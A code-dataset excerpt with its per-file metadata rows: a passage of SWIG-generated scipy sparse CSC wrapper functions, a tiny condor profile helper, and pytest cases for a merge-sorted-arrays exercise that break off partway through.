return _csc.csc_plus_csc(*args)
def csc_minus_csc(*args):
"""
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, signed char [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, unsigned char [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
short [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, unsigned short [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
int [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, unsigned int [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, long long [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, unsigned long long [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
float [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
double [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, long double [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cfloat_wrapper [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cdouble_wrapper [] Cx)
csc_minus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_clongdouble_wrapper [] Cx)
"""
return _csc.csc_minus_csc(*args)
def csc_ne_csc(*args):
"""
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ne_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
"""
return _csc.csc_ne_csc(*args)
def csc_lt_csc(*args):
"""
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_lt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
"""
return _csc.csc_lt_csc(*args)
def csc_gt_csc(*args):
"""
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_gt_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
"""
return _csc.csc_gt_csc(*args)
def csc_le_csc(*args):
"""
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_le_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
"""
return _csc.csc_le_csc(*args)
def csc_ge_csc(*args):
"""
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_ge_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
"""
return _csc.csc_ge_csc(*args)
# This file is compatible with both classic and new-style classes.
| 66.510373 | 126 | 0.613887 | 7,892 | 48,087 | 3.565003 | 0.019387 | 0.344908 | 0.13979 | 0.089995 | 0.942456 | 0.941674 | 0.937587 | 0.931153 | 0.918216 | 0.918216 | 0 | 0.000928 | 0.260465 | 48,087 | 722 | 127 | 66.602493 | 0.790226 | 0.891218 | 0 | 0.117647 | 1 | 0 | 0.03255 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0.070588 | 0.105882 | 0.011765 | 0.588235 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 12 |
fe443971e0da440e58f2d9ef1122507c4c796cd1 | 124 | py | Python | src/profiles/vanilla/condor.py | san-bil/pyena | 41bd3e61aa8551f65433c7631e42f214dbf01508 | [
"MIT"
] | null | null | null | src/profiles/vanilla/condor.py | san-bil/pyena | 41bd3e61aa8551f65433c7631e42f214dbf01508 | [
"MIT"
] | null | null | null | src/profiles/vanilla/condor.py | san-bil/pyena | 41bd3e61aa8551f65433c7631e42f214dbf01508 | [
"MIT"
] | null | null | null | import getpass
def get_vanilla_condor_profile():
return {'presubmit_auth_steps':"'echo No pre-auth steps required.'"}
| 20.666667 | 72 | 0.758065 | 17 | 124 | 5.235294 | 0.882353 | 0.202247 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 124 | 5 | 73 | 24.8 | 0.824074 | 0 | 0 | 0 | 0 | 0 | 0.439024 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 9 |
fe531f59f8b49a1d4ab876a7dee8a731cf5809c8 | 7,454 | py | Python | 139 Merge Sorted Arrays/Merge_Sorted_Arrays_test.py | Iftakharpy/AlgoExpert-Questions | f4aef449bfe0ee651d84a92487c3b3bedb3aa739 | [
"Apache-2.0"
] | 3 | 2021-11-19T07:32:27.000Z | 2022-03-22T13:46:27.000Z | 139 Merge Sorted Arrays/Merge_Sorted_Arrays_test.py | Iftakharpy/AlgoExpert-Questions | f4aef449bfe0ee651d84a92487c3b3bedb3aa739 | [
"Apache-2.0"
] | null | null | null | 139 Merge Sorted Arrays/Merge_Sorted_Arrays_test.py | Iftakharpy/AlgoExpert-Questions | f4aef449bfe0ee651d84a92487c3b3bedb3aa739 | [
"Apache-2.0"
] | 5 | 2022-01-02T11:51:12.000Z | 2022-03-22T13:53:32.000Z | from Merge_Sorted_Arrays import mergeSortedArrays
def test_mergeSortedArrays_case_1():
assert mergeSortedArrays(arrays=[[1, 5, 9, 21], [-1, 0], [-124, 81, 121], [3, 6, 12, 20, 150]]) == [-124, -1, 0, 1, 3, 5, 6, 9, 12, 20, 21, 81, 121, 150]
def test_mergeSortedArrays_case_2():
assert mergeSortedArrays(arrays=[[-92, -78, -68, 43, 46, 46, 79, 79], [-66, -49, -26, -16, 21, 28, 33, 50], [-40, -8, 12, 20, 36, 38, 81], [-76, -74, -62, -46, -23, 33, 42, 48, 55, 94]]) == [-92, -78, -76, -74, -68, -66, -62, -49, -46, -40, -26, -23, -16, -8, 12, 20, 21, 28, 33, 33, 36, 38, 42, 43, 46, 46, 48, 50, 55, 79, 79, 81, 94]
def test_mergeSortedArrays_case_3():
assert mergeSortedArrays(arrays=[[-95, -74, 1], [-28, 28, 95], [-89, -78, -67, -66, -25, -22, 2, 38], [-86, -35, -25, -13, 41], [-85, -77, -21, 72], [-55, 4, 84, 98], [-75, -73, 22]]) == [-95, -89, -86, -85, -78, -77, -75, -74, -73, -67, -66, -55, -35, -28, -25, -25, -22, -21, -13, 1, 2, 4, 22, 28, 38, 41, 72, 84, 95, 98]
def test_mergeSortedArrays_case_4():
assert mergeSortedArrays(arrays=[[-79, -43, -15, 89], [-48, 13, 20], [-33, -19, -8, 12, 40, 44, 50, 52, 91, 95], [-100, -43, -8, 17], [-15, 81]]) == [-100, -79, -48, -43, -43, -33, -19, -15, -15, -8, -8, 12, 13, 17, 20, 40, 44, 50, 52, 81, 89, 91, 95]
def test_mergeSortedArrays_case_5():
assert mergeSortedArrays(arrays=[[-88, -56, -43, -41, -13, -8, 82], [-38, 53], [-75, -48, -42, -27, 20, 35, 55], [-55, -50, -48, -45, 62, 69, 77], [-90, -27, -22, -19, -6, -3, 4, 6, 91], [-86, -67, -66, 2, 8, 8, 39, 74], [-62, 34, 40, 42, 47, 48, 55, 56, 68, 87]]) == [-90, -88, -86, -75, -67, -66, -62, -56, -55, -50, -48, -48, -45, -43, -42, -41, -38, -27, -27, -22, -19, -13, -8, -6, -3, 2, 4, 6, 8, 8, 20, 34, 35, 39, 40, 42, 47, 48, 53, 55, 55, 56, 62, 68, 69, 74, 77, 82, 87, 91]
def test_mergeSortedArrays_case_6():
assert mergeSortedArrays(arrays=[[-93, -83, -43, -32, -32, -15, -14, 12, 78, 80], [-83], [-82, -51, -29, 40, 60, 76, 80], [50], [-33, -16], [-100], [-33, -11, 23, 29, 29, 43], [0, 70], [-57, -43, -41, -18, -5, 74]]) == [-100, -93, -83, -83, -82, -57, -51, -43, -43, -41, -33, -33, -32, -32, -29, -18, -16, -15, -14, -11, -5, 0, 12, 23, 29, 29, 40, 43, 50, 60, 70, 74, 76, 78, 80, 80]
def test_mergeSortedArrays_case_7():
assert mergeSortedArrays(arrays=[[98], [-87, -79, -56, -33, -20, -10, -5, 19, 49, 86], [-73, -49], [-98, -63, -47, -4, 21], [-56, -43, -24, 8, 34, 80, 83], [-83, -65, -61, -30, -26, -16, 16, 19], [-91, -42, -21, 91], [-73, -62, -56, -30, 11, 67], [-91, -90, -40, 32, 94]]) == [-98, -91, -91, -90, -87, -83, -79, -73, -73, -65, -63, -62, -61, -56, -56, -56, -49, -47, -43, -42, -40, -33, -30, -30, -26, -24, -21, -20, -16, -10, -5, -4, 8, 11, 16, 19, 19, 21, 32, 34, 49, 67, 80, 83, 86, 91, 94, 98]
def test_mergeSortedArrays_case_8():
assert mergeSortedArrays(arrays=[[-81, 36, 57, 59], [-65, -58, -47, -39, 29, 53, 66, 75, 88, 92], [-67, -54, -40, -25, 9, 17, 55, 75, 94], [-35, -3, 24, 82], [-86, 32, 95]]) == [-86, -81, -67, -65, -58, -54, -47, -40, -39, -35, -25, -3, 9, 17, 24, 29, 32, 36, 53, 55, 57, 59, 66, 75, 75, 82, 88, 92, 94, 95]
def test_mergeSortedArrays_case_9():
assert mergeSortedArrays(arrays=[[-93, -83, -78, -75, -40, -32, 48], [-90, -75, -57, 7, 11, 21, 53, 84, 89], [-50, -40, -20, 71, 96], [-49, 13, 18, 61, 97], [42, 96]]) == [-93, -90, -83, -78, -75, -75, -57, -50, -49, -40, -40, -32, -20, 7, 11, 13, 18, 21, 42, 48, 53, 61, 71, 84, 89, 96, 96, 97]
def test_mergeSortedArrays_case_10():
assert mergeSortedArrays(arrays=[[-63, -55, -9, 37, 86, 97], [-62, -48, -37, -16, 11, 33, 80, 97], [-51, 5, 34], [-24, -24, -19, 32, 46, 97], [-98, -56, -12, -2, -1, 11, 47, 79], [-59, 64, 93, 96], [-96, -51, -21, -18, 29, 57, 87, 90, 92], [-89, -85, -55, -12, 27], [-96, -96, -95, -95, -71, -45, -28, 8, 19, 100]]) == [-98, -96, -96, -96, -95, -95, -89, -85, -71, -63, -62, -59, -56, -55, -55, -51, -51, -48, -45, -37, -28, -24, -24, -21, -19, -18, -16, -12, -12, -9, -2, -1, 5, 8, 11, 11, 19, 27, 29, 32, 33, 34, 37, 46, 47, 57, 64, 79, 80, 86, 87, 90, 92, 93, 96, 97, 97, 97, 100]
def test_mergeSortedArrays_case_11():
assert mergeSortedArrays(arrays=[[49, 72], [-95, -49, -18, -16, 1, 16, 36, 40, 75, 92], [-77, 11, 65, 91]]) == [-95, -77, -49, -18, -16, 1, 11, 16, 36, 40, 49, 65, 72, 75, 91, 92]
def test_mergeSortedArrays_case_12():
assert mergeSortedArrays(arrays=[[-94, -93, -25, -2, 67, 85], [-83, -74, 64], [-83, 10, 46, 64], [-94, -54, -40, 9, 22, 49]]) == [-94, -94, -93, -83, -83, -74, -54, -40, -25, -2, 9, 10, 22, 46, 49, 64, 64, 67, 85]
def test_mergeSortedArrays_case_13():
assert mergeSortedArrays(arrays=[[-87, -67, -56, -15, 67], [-98, -90, -85, -3, 5, 43, 44], [-97, -78, -73, -65, -17, 27, 66, 77, 78, 92], [-99, -62, 11, 15, 50]]) == [-99, -98, -97, -90, -87, -85, -78, -73, -67, -65, -62, -56, -17, -15, -3, 5, 11, 15, 27, 43, 44, 50, 66, 67, 77, 78, 92]
def test_mergeSortedArrays_case_14():
assert mergeSortedArrays(arrays=[[-79, -77, -48, -39, -27, 10, 39, 61, 83, 99], [-93, 10], [-98, -90, -44, -33, -5, 40, 69, 90, 96], [-93], [-32, 9, 14, 20, 85]]) == [-98, -93, -93, -90, -79, -77, -48, -44, -39, -33, -32, -27, -5, 9, 10, 10, 14, 20, 39, 40, 61, 69, 83, 85, 90, 96, 99]
def test_mergeSortedArrays_case_15():
